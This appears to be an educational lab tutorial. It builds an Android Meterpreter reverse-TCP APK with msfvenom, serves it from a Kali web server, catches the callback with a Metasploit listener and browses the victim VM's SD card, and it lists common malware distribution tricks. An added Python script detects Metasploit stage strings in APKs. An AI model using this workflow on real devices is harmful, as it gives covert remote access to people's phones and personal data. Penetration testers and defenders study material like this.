**Note: The content in this article is only for educational purposes and understanding of cybersecurity concepts. It should enable people and organizations to have a better grip on threats and know how to protect themselves against them. Please use this information responsibly.**
Before starting with Android exploitation
Let's first look at Android, an operating system (OS) built on the Linux kernel that has become a powerhouse in mobile technology. Android Inc. first developed it, but Google bought the company in 2005. Android launched in 2007, simultaneously with the creation of the Open Handset Alliance, a group of hardware, software, and telecom companies. Since then, Android has grown quickly, changing how we use mobile devices and interact with the digital world.
In this guide, we’ll explore how to create an APK file using Kali Linux’s tools. Kali Linux has many hacking tools and frameworks for different stages of pen testing. We’ll use Metasploit’s Android payloads and the msfvenom tool to create the APK file.
Here, we are going to exploit Android-x86 4.4-r4.
Download the android-x86 4.4-r4 from here.
https://drive.google.com/file/d/1D8v7JAwByzZvRxZBKYRekWCqL7nHxv-E/view?usp=sharing
Msfvenom is a command-line tool in the Metasploit Framework that helps create payloads. You can use it to make custom payloads for different platforms and architectures.
Msfvenom is a flexible payload generator in Metasploit, a top open-source penetration testing framework. It lets users build payloads for many architectures, operating systems, and delivery methods. Whether you’re targeting Windows, Linux, macOS, or mobile platforms, Msfvenom allows you to design payloads that fit various exploitation needs.
Step 1: Create a fake APK file. Use msfvenom to generate the payload (the -o argument is the output file name; this guide uses yam.apk throughout).
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP of your machine> LPORT=1234 -o yam.apk
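From the defender's side, an APK built this way carries recognizable leftovers of the Metasploit Android stage. The following added example (not part of the original guide) scans an APK's classes*.dex and AndroidManifest.xml for those strings; it assumes the stock msfvenom stage package is com.metasploit.stage with a Payload entry class, and it uses small constructed zip files in place of real APKs so it runs offline.

```python
import io
import zipfile

# Strings the stock msfvenom android/* payloads leave in the built APK
# (assumption: Metasploit's default stage package is com.metasploit.stage and
# its entry point is the Payload class; the app itself shows up as MainActivity).
INDICATORS = (
    b"com/metasploit/stage",
    b"com.metasploit.stage",
    b"Lcom/metasploit/stage/Payload;",
)


def find_metasploit_indicators(apk_bytes: bytes) -> list[str]:
    """Return 'entry: indicator' hits found in the APK, or [] if none.

    classes*.dex stores strings as (M)UTF-8, while the binary-XML string pool in
    AndroidManifest.xml is usually UTF-16LE, so each indicator is tried both ways.
    """
    hits = []
    try:
        with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
            for name in z.namelist():
                is_dex = name.startswith("classes") and name.endswith(".dex")
                if not is_dex and name != "AndroidManifest.xml":
                    continue
                data = z.read(name)
                for ind in INDICATORS:
                    for enc in (ind, ind.decode().encode("utf-16-le")):
                        if enc in data:
                            hits.append(f"{name}: {ind.decode()}")
                            break
    except zipfile.BadZipFile:
        return ["not a valid APK/zip container"]  # corrupt or non-zip input
    return hits


def build_sample_apk(dex_strings: bytes, package: str) -> bytes:
    """Constructed, APK-shaped zip for testing; not a real installable APK."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", package.encode("utf-16-le"))
        z.writestr("classes.dex", b"dex\n035\x00" + dex_strings)
    return buf.getvalue()


STAGED_APK = build_sample_apk(b"Lcom/metasploit/stage/Payload;Lcom/metasploit/stage/MainActivity;",
                              "com.metasploit.stage")
BENIGN_APK = build_sample_apk(b"Lcom/example/notes/MainActivity;", "com.example.notes")

if __name__ == "__main__":
    for label, apk in (("staged", STAGED_APK), ("benign", BENIGN_APK)):
        print(label, find_metasploit_indicators(apk) or "no indicators")
```

Run it against a real file with `find_metasploit_indicators(open("yam.apk", "rb").read())`; an empty list only means the default strings are absent, not that the APK is safe.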
Kali Linux often serves as a web server to host websites and web apps. Linux stands out as an open-source platform, allowing users to tweak the system as they see fit. This adaptability makes Linux a top pick for server setups. For example, coders can grab code from repositories, tweak source code, and build their own kernel versions.
Bad actors employ several tricks to spread bogus apps like this one to Android users. Here's a list of common methods:
- Phishing Emails
- Malicious Websites
- Social Engineering
- Third-party App Stores
- Compromised Legitimate Applications
- Free Software Bundles
- Fake Updates
Step 2: Turn your Kali Linux machine into a web server. Start Apache with the following command.
$ service apache2 start
To check the status, run
$ service apache2 status
Step 3: We have to copy the payload to the hosted directory of Kali Linux.
$ cp yam.apk /var/www/html
The cp yam.apk /var/www/html command copies a file called yam.apk to the /var/www/html folder. Linux systems use cp to copy files and folders. Here, yam.apk is the file you want to copy, and /var/www/html is where you want to put it. When you run this command, a copy of yam.apk lands in the web server's document root. This lets the web server access and share the file. It's handy to place files in this spot when you need them to be available on a website.
Step 4: Now open the browser on the Android VM and enter the URL of the payload, <ip of kali linux>/<name of payload>, for example:
192.168.64.144/yam.apk
Why use the browser to handle APK files:
People often use web browsers to get APK files from websites. They can download these files straight to their Android devices to install them or save them on a computer to move later. Developers and security experts may want to look inside an APK file. They can use web-based tools and services for this, like APK Analyzer or online virus checkers. These tools can examine what’s in the APK and how it behaves.
Many websites have APK files ready to download. Users just go to these sites with their browsers to get the files. Also, some online emulators and testing platforms let developers upload APK files through a browser. These platforms create a fake Android environment, so developers can test their apps right in the browser.
Step 5: The APK file gets downloaded automatically.
Step 6: When you click the yam.apk file, it installs on the emulator. To open the app, go to the MainActivity app on your device and start it. Once you open the app, the payload connects back to your Kali machine and sets up a Meterpreter session.
Step 7: To connect with the mobile device, we'll use the Metasploit Framework. This open-source tool packs a punch when it comes to probing for vulnerabilities and breaking into systems. Rapid7 created it, giving security experts and ethical hackers a complete platform to check and improve the safety of networks and applications.
Step 8: Open the Metasploit console:
$ msfconsole -q
In the MSF console, create a listener (handler) for the payload:
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ show options
The multi/handler module does not attack anything itself; it listens for an incoming connection and manages the payloads that Metasploit creates, like reverse shells or Meterpreter sessions.
Step 9: Set LHOST and LPORT and run the exploit
$ set LHOST <ip of kali linux>
$ set LPORT 1234
$ run
LHOST: The IP address of your own (Kali) machine. This is the address the target device will connect back to.
LPORT: Picks the local port to watch. This port needs to match the one you chose when you made the payload.
RHOST (Remote Host) and RPORT (Remote Port) come into play in exploit modules that reach out to a remote target to take advantage of weak spots. On the flip side, multi/handler acts as a watcher that sits and waits for the payload to call in. That’s why it uses LHOST and LPORT instead.
Step 10: Once the app launches on the Android VM, the handler reports a new Meterpreter session. A Meterpreter session connects back to your Metasploit instance, giving you remote access to the device.
A Meterpreter session is a high-level interactive command-line interface that Metasploit offers. When a payload links to your Metasploit instance, it creates a Meterpreter session. This allows you to control and interact with the compromised device from afar. The session provides a variety of tools to explore, exploit, and carry out post-exploitation tasks. You can manage files, get system info, and run commands, among other things.
$ cd /
$ ls
Step 11: Open the SD card.
Since SD cards contain lots of personal information, we move to the SD card to see what information the session can reach.
$ cd sdcard
$ ls
The contents of the SD card are now listed.
Conclusion:
Understanding these steps helps you recognize and prevent Android exploitation. To enhance your Android device's safety, implement defensive security by using strong passwords, enabling biometric locks, keeping software updated, and using antivirus protection.